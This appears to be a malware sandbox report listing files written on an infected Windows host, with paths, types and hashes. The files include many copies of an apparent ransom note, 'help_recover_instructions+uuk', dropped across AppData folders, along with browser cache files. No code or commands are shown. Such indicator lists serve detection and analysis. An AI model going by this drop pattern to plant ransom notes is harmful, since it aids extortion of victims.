C:\Users\admin\AppData\Local\Microsoft\Windows Mail\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows Media\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Windows Media\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows Sidebar\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Windows Sidebar\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows\1024\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Windows\1024\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows\1033\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Windows\1033\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows\AppCache\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows\History\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 22622805F6AD648CB7059495B0B9E9E1 SHA: D8D547476285D3D230781228E50416027021B229 SHA-256: 28E0FC59443E27312F9ECFACDC11230AE2031916D92EE5BFBD53C4F41B399292 SHA-512: F9F22084CE0E8D689EC8C9A8B31D1BD7B008723C4AEDEF0FBD1A39DB4C071F99A24DBAB7084A51C7CE9852B695713D249C711578A2CFA39B5E3B1CD70CB85D61
C:\Users\admin\AppData\Local\Microsoft\Windows\History\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 08A51730D85D72775653540AF183BF0B SHA: 1E6D82C8FE387F50984105746660A4036BAB6BB3 SHA-256: C7B80C837E3284622331083CF07E9A7070AFD0023485A411DDCEBC41B3DE6CBF SHA-512: D58519DE075905EF45229B3E68658AE3FC9D4FB7C667186B38632E150C4722AA5D167873C79914721CAEE2238489A9C5CC5C4CB1CA550FF8842C4789B6356C50
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DZGR304M\en[1].js	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DZGR304M\flash[1].png	Type: data MD5: 4519441BC988FE906DD07E40CB84D282 SHA: 50819FEE5A3B3553E6C19D2E3092BD4675BFFCE8 SHA-256: 2D1E228C3E2E5EE4527114B0E452958620E9B21B2735B252E38096F3DD9FE960 SHA-512: 9E225D59CFA5E40659EAFAFB3479DD3EB3CCFD058BC100494389D161221A8B1B36EB28605E90C91DE728FB011F94342D010A3705973E8F037EEABAE44CA21A30
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DZGR304M\jv0h[1].jpg	Type: data MD5: A19C8D8679F5E110DE555F7AEAE14610 SHA: 15CC51658969504EE2051B7B282D8D7CE4180A73 SHA-256: B8C1E37915C35E5CCFEB2E6045F5183B315CE5AA638E748685638626C7F3C4DB SHA-512: 4AA1767787CEC35B616C9EB712F872D988C73A9005662FDDD683FC95DAAD95F8A8E7C3CEC00C9B0515EB8B762D4063E74DEA9762DFD3544CE50C931BEFB1006B
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DZGR304M\yoe7ink[1].js	Type: data MD5: 09595EF6F623EDC066584799D992471C SHA: 748C406AAD04E15C9F99DB522ED7877B8572AA39 SHA-256: 87C84A736F3DD628C892A299119DED470373594A3EF0467EECC70EC785690508 SHA-512: 91A732C72590F8445D9807D35D2418282E01BF5497EBA400B64472AA81D7AD7DB29762021346E45DA2BEFCFCF879AA2BA5E86883AA3693B4E5E870BD7B324C74
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\97A08YXW.js	Type: data MD5: C02180DC8BDDA9C5065767CF11FD9D85 SHA: 5D1DC8373DA5E3F9D777680570370E6E3D39FD12 SHA-256: 01A005D8914342C45BFE50A0F9A79C33759225FA0B95C81A51C8FB47CA6498C1 SHA-512: 69D8803F6AF6F3F3D7C320AB58EE16C2B59D4DD9BC42756686D2A593AA6CDFFEDA9CD33ECED8697BDB3B1952D20DC81F55180852F8239CCB6316678E84955051
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AA42ckd[1].png	Type: data MD5: AC749FC7B6BDAF3F739A3AFB17AB2DBE SHA: 409E0596709D549690702061AE2FD06A31DD95BF SHA-256: E563A58DB378F53049D9E594D31FF63FCF42DB33AA898F0CFAC32B2264EFB437 SHA-512: E33B7E45B0684095F2167901D2E009F37B2DDFFE77128B3C615C1741C3947F71D7F0F9A0A0EF8DAF17F685316771B6E35B6653977F5930149A9227FB5685BFB2
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AA42hvs[1].png	Type: data MD5: 7ABCD83B24A5D15B36962C81E5A1940B SHA: 5EA4EFA409A36A0C201A8F6E049FBD51D8E111E2 SHA-256: 7C9AAF800FA77DF89C788A1675DA8CDF81DDAAA90ADCFA020EA64A4CD2AB13F1 SHA-512: A899CC377D79C5A4F190889C1528F23EEBDD04F500997EBB5B481E1EDE28C0BE4FD120188FA6DE27C18921ED296CA615260507385150F383B159C00509558F9E
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AA42ysf[1].png	Type: data MD5: 4AA0D9CC9AFCE3DE32553FE20F21BC1F SHA: 0DCACF1E877193EAF32C22F2F23882FF0E5E8849 SHA-256: 35C4931DE8667BA4C10B4AD3ABB8C703187428F01F7A394B8C09148B35BDAF73 SHA-512: ACD8DC65F7BA33C67F8763E002F00D4A2FE94A398B43A8BB4AE6F5D91EE626840BF7D8ADCFC525DA00AAD5508CE0D4F115FB5B2671627306C483D24D9878259C
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AA8GDem[1].png	Type: data MD5: 5ADF9B979C39C78D8B77400C780C6ED4 SHA: 3B90F5C33E0175385D1DD8FF6EB3EA734C6972EC SHA-256: E2E08F7449EC1ACF85FDE152B94BC623C913FF7C60EB8610AA8ADD597CEEE7FD SHA-512: CB0CD59610DDBCE1C1BFCC6F22635FBE0E4A1A96BCE45C158FF97DF8FE13FFF97D35153F7E23572A66645996265F4FD125C83406FAEF0F2054194EBDF314D3E3
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AAa43eW[1].jpg	Type: data MD5: 5891F174B15F5A10BCD4B7DFB96D6F69 SHA: A97DFECC398BE332EAD3E947A6808361CF19BE65 SHA-256: FBC9834982A904FC497686BD4BEF858FDC8800EAA489047FAF983846FAC90AD7 SHA-512: 1F0AFA3EFAC00967B663ECFB2F62B3F8E9186A78526D6D83297673D4708202DA33B190DC405256CDAD6511A3E631BB840EAC0FA11E7D16B02B30955E58F7B7A2
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AAa48Av[1].jpg	Type: data MD5: 513A22AE4DE144644B636BD4B30A6E88 SHA: 26623156FF90696C90D36F6BB334D263D1BBC047 SHA-256: 0FFED3D276A317EAAF3AA376736D0C02B5B8652C23387C9520872E3877B374DF SHA-512: 86D392CF732E3865597101672F0BD2C1F15DF374C473582E925D171C65C112C36B859CB68F6EE362EF872B4346252A0E9352A330553C0522F1E30D87817B2A7A
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AAa4KjH[1].jpg	Type: data MD5: DD3CB4B2D97035C37A9A0A8736FCADAD SHA: 3CCEE8CF33C88D6AE33E748E5459BA7473ACC746 SHA-256: FAF70D58CE696EF4EFCE7DAE138692B4B43F78A9F4226C08874B7DB4A40F54E3 SHA-512: E8963865B191463E0F48C18EFB41E895ADF4A796678E7A576F8A98617C2A56879515545823E19DEB190248098A8A00CDA2E32736A8C51A17F08C2A5D9DFBB961
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AAa4TEu[1].jpg	Type: data MD5: 32861DA881E01844C915572E625D2897 SHA: C16DB43A2F55EBEFB1735ABB5F404FED509ADBE8 SHA-256: 160720CAC261AC47CAC26ED487C2EDB4BDBCBBB61241AAEA8BDB498ECFFFF366 SHA-512: E5DFB175FC53A2E0A0E926103D5895C2A12233823A45DC571897AB6AB53023F698149F1DC88CA5E943AEEC2DF4C0FB96E97F9AD4AC7E60518C887F62BA1D76CB
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AAa4Uls[1].jpg	Type: data MD5: D9948030B77663535DFDF1D245F72EC3 SHA: 38D563F0B7CE1AF67FB1A043A56CB7D606F5129D SHA-256: F6F547F4653DA267C831892694F455D61F12F320568476E8E0B4DDB484412417 SHA-512: 650EECB2712521559FB10C10365ACF94F3D82296EF7208D5184E297EDE86FD03E2B2613DB864BB84A189E1DB05EC2EE42C296B855812A805836B753F6F32B518
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AAa4Yki[1].jpg	Type: data MD5: 34B0C1ABBF6B032C507BA9D83FB6D1C8 SHA: A0FB0DEA5C6F1416DF85B43CDA32A45D5D510339 SHA-256: F53622A8F48EC7C72F130E2EFFC6CF96F527090828612EBE6DEDECA66398E52C SHA-512: 1CDC2C3D7D06CECEB833CA714101020A988E8F2D4F98020D055F2DDF48CA21C532A4E1B2B67BDB4DB10E3229A18A831BCAF4915BC3C8094EA3317D1E3A4F6F62
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AAa4eAS[1].jpg	Type: data MD5: 9B8B7F951818935131BEDD146F02B479 SHA: B9128452DEAAF870A3AC53FAE809378D8C8D649F SHA-256: 133907AB0BA8BB8E220340CDD5EFCD863D38191AC649482A335F8D8EAF0D5272 SHA-512: 7C767950AD9FAA59A49AD3B5B824D3E8188A66ADC69D618C48194C540D4DB50A7AA21496A5F75AB161707895716CD00EFC525BD4FCA304B0389D0F92DB4D0887
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AAa4qLc[1].jpg	Type: data MD5: 9499AA35F95A8CC707E0E4ED8A6477DD SHA: BDB9891E6EF3539A585C5A8921069AFEF9884AF6 SHA-256: C0271035F47A6B2C72CED76C6EC0B372656C432482CAAF28ED856AFB27A80D36 SHA-512: 6B0BE2DC7B5557E43203D0BF33900B62D98DA52C26D6DF10809474B6F31248A3DE9749DF437C7C0989C38A6A543803F5647EA9C26C8FC742CDADD62EB265810E
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AAa4xSU[1].jpg	Type: data MD5: AECCBFA0E4DE5B2451F6842E1F737BF5 SHA: EC13514171DA8E70A956F2D762971FCD705A2FE1 SHA-256: C1399AE2D29552593CC565AC087EF47D3FB2596985EFA541601AD71B85C8600D SHA-512: D5FD01E450AA15ADFC169E4D9434474F818C04DDC49D79653F5D6AA8B98BDC81E67A09EB1965B84D9981F665F68938D4B14C714F3CD79CBC81946BF24C58CD90
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\AAa550m[1].jpg	Type: data MD5: 6185363758424547695413BAFFA36D47 SHA: FACBD77BB48F02BB1C2D657400E8D39D6A2BC576 SHA-256: E926EF975405C6CE02FD57E664EA95A6D5A4BDFC5B8393DBEA55F9905BC92DAB SHA-512: 1E8F6CF750F130BAE833C209CA7AB1BA61CBCFBB39BE3D11DDE9710751DD8FA920B0F021A58D85FBE2287EF8D3040A56BA56751DB8FDD5771677B4346C8D96E6
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\BB1kc8s[1].png	Type: data MD5: FEF4F725F5D5A7E73F968EC4D0EA013B SHA: F865A23598D43079DB876E2AD2D7A3CE0F9349A6 SHA-256: 99D5E47AB440F056D28978B8BC79701811D0C45F3BE4CBC4D791ABC709C62DB9 SHA-512: A52245FCF48047779DA65C9BB51CF069B9FE9410868AF4409281B5520427C44E39E9383CA3D416195AB44D67BF0700AF144583D03185AFF262F7073D82772A45
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\BB1kvzy[1].png	Type: data MD5: 08A82A3D1C7EF4C273A62AC729D4AE9D SHA: 23B99C64B06737CA405B8A52A612383581E0A81F SHA-256: B7CC664FD97DF94C62C45505469A9F0DA491122B5362214077350881435C4CDE SHA-512: 7B18D6E4F7F658C6D88744DDF4E46AB93782A32CD554575142C93137092EDE72C22239A9DCD59EA6686AF78F36D53F987AC47590D23ECB6A52AFA6A3D067901B
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\BBh5ZBR[1].png	Type: data MD5: BEF654AB174E228C8894B5045C5E47B2 SHA: 0392EC60CF8855BA72127BAEEDC0AAECD8D87A48 SHA-256: E861C32B1B41ABE466122D8A345E76E06CC4902E4C7426A58A1FD973583B39A5 SHA-512: D9B7C91B76D5221BF2887817BC11FEF911139BC763EAF6F5959972E6CA99DA2670179905E176BDEEC18794164984EA12AAE6170F02EABE4C5513719D9E3EF8D5
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\Bing[1].png	Type: data MD5: 3767330D1DB1823240474FD5ECA0F242 SHA: A67F5645BB9B21DF084B858539857FA20D39C4F2 SHA-256: 0003F7F8C738C0E6C15BF074CDF8ECDB52BBF3E5F19924EFDF8813E2B6F415B2 SHA-512: 766F5C2EE93B7881CB82D30A01804C2D28886B014EEF8CFBDC06C5C3BFEE2126DCDAC6B05BDAF81994F385D9B96B3DFA54DE930DDEEA1F639DF30FA0A961D9B0
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\dapmsn[1].js	Type: data MD5: C2A43217CB28522FA13D39A8618D5C24 SHA: 0E6A1A50B019EA18E75620A4EED8A270330F2E31 SHA-256: EBDBE9A4334D80BD2A04A159EFBD14EB1094D920D0A1296282BD92E3301FE111 SHA-512: ECE455996606AB8CD29D6969621443540AC6F5A3C061CDFF003198A24A3DC2D768536C959A812A0CF1824689875E8901C3752A0737D4CE89E31664DC8BB45621
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\default[1].css	Type: data MD5: 947EC38593170D96D4865D8710A7490F SHA: 108E9DBECCB182F964A62EE04ED40FDA2D731863 SHA-256: FE5112BC8F14DD440AD88812429C96544DBB2520C2E29379E237EF68B5C86DA2 SHA-512: 7B01BBFE17921E1519F61EB88B126BF61E1356D0C5E911DBD2799271BD4B1F25E39E0D9EDC91C74F241DE832898540286C38581B7CD225E6A393924FEFF17FF9
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\gl_site[1].svg	Type: data MD5: DA30FEC6FFD25C3644AF72934F8592AA SHA: 41B4E663D3DC20ACF16AED441F55A1C8E9B7A645 SHA-256: C2E206178FAECEEFDDF483A95B2E37A4EB9C1A77F05BCED483AEEFBA501489D8 SHA-512: A3ACA1B169E288BF5EBF3E69318D66B4FE837C91589107CDC51C7587E2D507D2A4FB3900E14E2D0CFFEFBCE7D8791DFEE2EBA819BFFCD48BD277947892ACDB42
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\ie[1].png	Type: data MD5: 40432EF1B3B2EBC6C2666E1A014B1134 SHA: 53AC2A4F5DBE64ABF04BEF647269D07A2D982C78 SHA-256: 2B749B16AA329FD495430201CE1BB2AF5B3AFE6E1E709E7B677653AC069956C3 SHA-512: 6F584521748BE2716A14C033F9A33CB815DD4839297DE2077912B83CBA03216C30948A54FB824E421B00E98E8FDC105094FF4FC42723E65C3A6F7909C6D1F03E
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OKZXCG0M\3R26L202.js	Type: data MD5: C02180DC8BDDA9C5065767CF11FD9D85 SHA: 5D1DC8373DA5E3F9D777680570370E6E3D39FD12 SHA-256: 01A005D8914342C45BFE50A0F9A79C33759225FA0B95C81A51C8FB47CA6498C1 SHA-512: 69D8803F6AF6F3F3D7C320AB58EE16C2B59D4DD9BC42756686D2A593AA6CDFFEDA9CD33ECED8697BDB3B1952D20DC81F55180852F8239CCB6316678E84955051
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OKZXCG0M\76HMLWKC.txt	Type: ASCII text, with no line terminators MD5: 533AB858AEECF5A00795CB2C4FBFF5C0 SHA: A838565E58D6523A79C9E2FC3324B2EE6D480DF8 SHA-256: E1411D9D3C0310655326A331F37093393C0102697AC96679AE74A958419DA2EE SHA-512: 27796CEFB9FF60F445B9AFCDAD469C2681DE04B507DE178F3529179D5D2EDACBD7ACD1BFD030283D881FB1A94F54DAA0572E36A4898ED3CDA34181853C89D251
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OKZXCG0M\AA3e1pt[1].png	Type: data MD5: 0381FD73A1AF4647F52E70A95C11A370 SHA: 646B9D3E4C84AC48093E014C96836930850F1F78 SHA-256: 1BE6A2B9BC5BB8BD26A2605F7883F582A72EFF1AD71B3B42E2EC3CCCFC12EE98 SHA-512: A7E909B233666BC12F3D5F74061E31F1C0123C75C5715135A959BF30937E6ABD378ADE39C2ECA297509725CC0D95750BC1531D2FD989DC971E5FAB08CD41EAAD
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OKZXCG0M\AA9jD9S[1].jpg	Type: data MD5: E2815245BC93BFF7FC55B6DF867C7195 SHA: D75D15315615C95A04DCCDA2CD6EC98EE78AA180 SHA-256: AD9B7B1EA8205771FB57721ACAA17B31EC11F5E3B9D4E33C61C2AC722AB83CFB SHA-512: B5CC5B6A752317BC9C99FB17A5FDFBE1B9EE748DD31AB0A576C6EF3AB4EB5ADF16A580DE132A554C5645422A65026B52F3712D0F0D991F70F33BEAA1A0EA29AC
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OKZXCG0M\AA9xEjQ[1].jpg	Type: data MD5: 3E5F8691CCC9A3ADB13116C177F4273C SHA: BDE31E5B5CD2927CC579CC3657384ED03072D379 SHA-256: D4B202E168DA2EC45695468EE1918A34FDF48BFB2D5A037685E993CAA8070D57 SHA-512: 2F8CAE3E2A2C32BBA065F6ED087FC155F2503DB3B766231A07EB14E37BFB4A2F59F18D3413E1B30C9A7F968EABB3EA0FF8084C1A4F2ECEB126D260D346C704D5
